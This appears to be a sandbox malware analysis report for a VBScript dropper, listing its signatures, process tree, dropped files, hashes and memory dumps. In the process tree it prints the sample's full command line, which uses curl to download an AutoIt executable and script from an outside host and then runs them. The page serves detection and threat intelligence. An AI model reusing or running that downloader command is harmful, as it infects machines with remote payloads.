ffc7197524bf47757b756546e880c089875a549fddd20a5e1cef0d7e7b281c38

Analysis

max time kernel
155s
max time network
165s
platform
windows10-2004_x64
resource
win10v2004-20230915-es
resource tags

arch:x64arch:x86image:win10v2004-20230915-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
12/10/2023, 22:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

otoke.vbs
Size

27KB
MD5

ca04e20c7652a5ca78f73918591c2d87
SHA1

1718223db20fa1383aef308f76aa87bae002d662
SHA256

ffc7197524bf47757b756546e880c089875a549fddd20a5e1cef0d7e7b281c38
SHA512

b2a6d36f2456007748b2125233e9a7e0206948bd841eb444f029edcb2c171409b25d1108c2643385bf762d1c291b4265ce7d57003b2f266e1c6d07750d0fd574
SSDEEP

768:0QgdN5RyiUiK3IfJO37NwNGFFNWePDUirUif3IhBN6sEx:9Am

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

description	pid	Process	procid_target
PID 1496 created 3608	1496	Autoit3.exe	84
PID 2232 created 4604	2232	cmd.exe	12
PID 2232 created 3532	2232	cmd.exe	30

Blocklisted process makes network request 25 IoCs

flow	pid	Process
37	2232	cmd.exe
38	2232	cmd.exe
39	2232	cmd.exe
40	2232	cmd.exe
41	2232	cmd.exe
42	2232	cmd.exe
45	2232	cmd.exe
52	2232	cmd.exe
56	2232	cmd.exe
57	2232	cmd.exe
61	2232	cmd.exe
65	2232	cmd.exe
73	2232	cmd.exe
74	2232	cmd.exe
75	2232	cmd.exe
77	2232	cmd.exe
78	2232	cmd.exe
86	2232	cmd.exe
87	2232	cmd.exe
91	2232	cmd.exe
94	2232	cmd.exe
95	2232	cmd.exe
97	2232	cmd.exe
98	2232	cmd.exe
99	2232	cmd.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ebebgcc.lnk	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
1496	Autoit3.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1496 set thread context of 2232	1496	Autoit3.exe	92
PID 2232 set thread context of 3012	2232	cmd.exe	93
PID 2232 set thread context of 2344	2232	cmd.exe	97

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
5020	3012	WerFault.exe	93
3564	3012	WerFault.exe	93

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	cmd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	cmd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	cmd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	cmd.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1496	Autoit3.exe
1496	Autoit3.exe
1496	Autoit3.exe
1496	Autoit3.exe
2232	cmd.exe
2232	cmd.exe
2232	cmd.exe
2232	cmd.exe
2232	cmd.exe
2232	cmd.exe
2344	cmd.exe
2344	cmd.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 664 wrote to memory of 464	664	WScript.exe	83
PID 664 wrote to memory of 464	664	WScript.exe	83
PID 464 wrote to memory of 2568	464	cmd.exe	85
PID 464 wrote to memory of 2568	464	cmd.exe	85
PID 464 wrote to memory of 1040	464	cmd.exe	86
PID 464 wrote to memory of 1040	464	cmd.exe	86
PID 464 wrote to memory of 1496	464	cmd.exe	88
PID 464 wrote to memory of 1496	464	cmd.exe	88
PID 464 wrote to memory of 1496	464	cmd.exe	88
PID 1496 wrote to memory of 2232	1496	Autoit3.exe	92
PID 1496 wrote to memory of 2232	1496	Autoit3.exe	92
PID 1496 wrote to memory of 2232	1496	Autoit3.exe	92
PID 1496 wrote to memory of 2232	1496	Autoit3.exe	92
PID 1496 wrote to memory of 2232	1496	Autoit3.exe	92
PID 2232 wrote to memory of 3012	2232	cmd.exe	93
PID 2232 wrote to memory of 3012	2232	cmd.exe	93
PID 2232 wrote to memory of 3012	2232	cmd.exe	93
PID 2232 wrote to memory of 3012	2232	cmd.exe	93
PID 2232 wrote to memory of 3012	2232	cmd.exe	93
PID 2232 wrote to memory of 2344	2232	cmd.exe	97
PID 2232 wrote to memory of 2344	2232	cmd.exe	97
PID 2232 wrote to memory of 2344	2232	cmd.exe	97
PID 2232 wrote to memory of 2344	2232	cmd.exe	97
PID 2232 wrote to memory of 2344	2232	cmd.exe	97

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
PID:4604
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe
  2⤵
  PID:3012
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3012 -s 184
    3⤵
    - Program crash
    PID:5020
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3012 -s 432
    3⤵
    - Program crash
    PID:3564

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3532
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe
  2⤵
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:2344

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\otoke.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:664
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" f InStr(1, WScript.ScriptFullName,"vbs", 1) > 0 Then:path = WScript.ScriptFullName:end if '/c cd /d %temp% & curl -o Autoit3.exe http://vn.abcxzy.com:2351 & curl -o bdwugn.au3 http://vn.abcxzy.com:2351/msiwdliczul & Autoit3.exe bdwugn.au3
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:464
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3608
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Blocklisted process makes network request
      Drops startup file
      Suspicious use of SetThreadContext
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2232
- - C:\Windows\system32\curl.exe
    curl -o Autoit3.exe http://vn.abcxzy.com:2351
    3⤵
    PID:2568
- - C:\Windows\system32\curl.exe
    curl -o bdwugn.au3 http://vn.abcxzy.com:2351/msiwdliczul
    3⤵
    PID:1040
- - C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
    Autoit3.exe bdwugn.au3
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3012 -ip 3012
1⤵
PID:1768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3012 -ip 3012
1⤵
PID:4864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\gdeedab\Autoit3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\ProgramData\gdeedab\babkckf\dhahhfc

Filesize
168B

MD5
08c02c9c32c4c164fd1703bb16005e67

SHA1
4987c20541eb7b65ed8a499db0b42e86ca106553

SHA256
9ae2c961e235261d1c758fd524cd4b55debaf4a43f69c312a40f9f1705857dfb

SHA512
af82b5b1f0314bf31b7f93895d436a7d8aa3a7ba48df18be444196cc08c755e378eaf1bf7634a4e346e60f219b392f3d017a4162526062e9a0a548d48adaa8cd

Download Submit
C:\ProgramData\gdeedab\fkbdcaa.au3

Filesize
11KB

MD5
46396167381997789eb785aaeb4b37b0

SHA1
c68d733025bbbed604e3b8a14f420daad675e7ef

SHA256
f9638c437fb7f37a3e788c5b9018fe6ed412d9e1a502140a4284106ebb2f711e

SHA512
2a3b7837c87b4506ab6590e1dfca724c9ece8da7d310396072f23599478ab632c130c87d48ce9e9e293f90368dc01615843f1fc60eb1033d76f550423f3d52d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autoit3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\bdwugn.au3

Filesize
11KB

MD5
46396167381997789eb785aaeb4b37b0

SHA1
c68d733025bbbed604e3b8a14f420daad675e7ef

SHA256
f9638c437fb7f37a3e788c5b9018fe6ed412d9e1a502140a4284106ebb2f711e

SHA512
2a3b7837c87b4506ab6590e1dfca724c9ece8da7d310396072f23599478ab632c130c87d48ce9e9e293f90368dc01615843f1fc60eb1033d76f550423f3d52d4

Download Submit
C:\temp\efhbkke

Filesize
4B

MD5
d0fce11293a75622323b2a1cfdb87f11

SHA1
fa9da727985c11244bc10169271c2929dfd0bd49

SHA256
522e0ac2bd5e7e7b1886ffae193bfb4657d0978346172feb383933b660e7e597

SHA512
caed29764e43bc822bc595ecf77b48ce609e2729ac066484e5e112d3954fe5cec8cc63d7ad787d5c28adda438285ef70a2ade86f3124f5f2909c950fa98658f0

Download Submit
C:\temp\jxszmm

Filesize
387KB

MD5
026020f84efa892f01d9cd4c875e539d

SHA1
08610df1d107e5d30eacea8e3a15287396012448

SHA256
b6fc8d1fdddfe5002b955df4402c80d1804d43b95b5f8d580ab1ffbc782bca73

SHA512
044bfe1fcb9aef465580c4938b5185382b9733b010232b576b6cb305c96826bd30bed36180d29243f5f827b7ff17f7b4d4b26a19863781fbfd13a5267fce4d99

Download Submit
\??\c:\temp\a

Filesize
387KB

MD5
026020f84efa892f01d9cd4c875e539d

SHA1
08610df1d107e5d30eacea8e3a15287396012448

SHA256
b6fc8d1fdddfe5002b955df4402c80d1804d43b95b5f8d580ab1ffbc782bca73

SHA512
044bfe1fcb9aef465580c4938b5185382b9733b010232b576b6cb305c96826bd30bed36180d29243f5f827b7ff17f7b4d4b26a19863781fbfd13a5267fce4d99

Download Submit
\??\c:\temp\a

Filesize
387KB

MD5
026020f84efa892f01d9cd4c875e539d

SHA1
08610df1d107e5d30eacea8e3a15287396012448

SHA256
b6fc8d1fdddfe5002b955df4402c80d1804d43b95b5f8d580ab1ffbc782bca73

SHA512
044bfe1fcb9aef465580c4938b5185382b9733b010232b576b6cb305c96826bd30bed36180d29243f5f827b7ff17f7b4d4b26a19863781fbfd13a5267fce4d99

Download Submit
\??\c:\temp\fkbdcaa.au3

Filesize
11KB

MD5
46396167381997789eb785aaeb4b37b0

SHA1
c68d733025bbbed604e3b8a14f420daad675e7ef

SHA256
f9638c437fb7f37a3e788c5b9018fe6ed412d9e1a502140a4284106ebb2f711e

SHA512
2a3b7837c87b4506ab6590e1dfca724c9ece8da7d310396072f23599478ab632c130c87d48ce9e9e293f90368dc01615843f1fc60eb1033d76f550423f3d52d4

Download Submit
\??\c:\temp\jxszmm

Filesize
387KB

MD5
026020f84efa892f01d9cd4c875e539d

SHA1
08610df1d107e5d30eacea8e3a15287396012448

SHA256
b6fc8d1fdddfe5002b955df4402c80d1804d43b95b5f8d580ab1ffbc782bca73

SHA512
044bfe1fcb9aef465580c4938b5185382b9733b010232b576b6cb305c96826bd30bed36180d29243f5f827b7ff17f7b4d4b26a19863781fbfd13a5267fce4d99

Download Submit
memory/1496-13-0x00000000057C0000-0x00000000059A9000-memory.dmp

Filesize
1.9MB

Download
memory/1496-37-0x00000000057C0000-0x00000000059A9000-memory.dmp

Filesize
1.9MB

Download
memory/1496-7-0x00000000014C0000-0x00000000018C0000-memory.dmp

Filesize
4.0MB

Download
memory/1496-6-0x00000000014C0000-0x00000000018C0000-memory.dmp

Filesize
4.0MB

Download
memory/2232-35-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/2232-50-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/2232-42-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/2232-44-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/2232-43-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/2232-45-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/2232-23-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/2232-34-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/2232-24-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/2232-26-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/2232-25-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/2344-54-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/2344-63-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/3012-49-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/3012-62-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download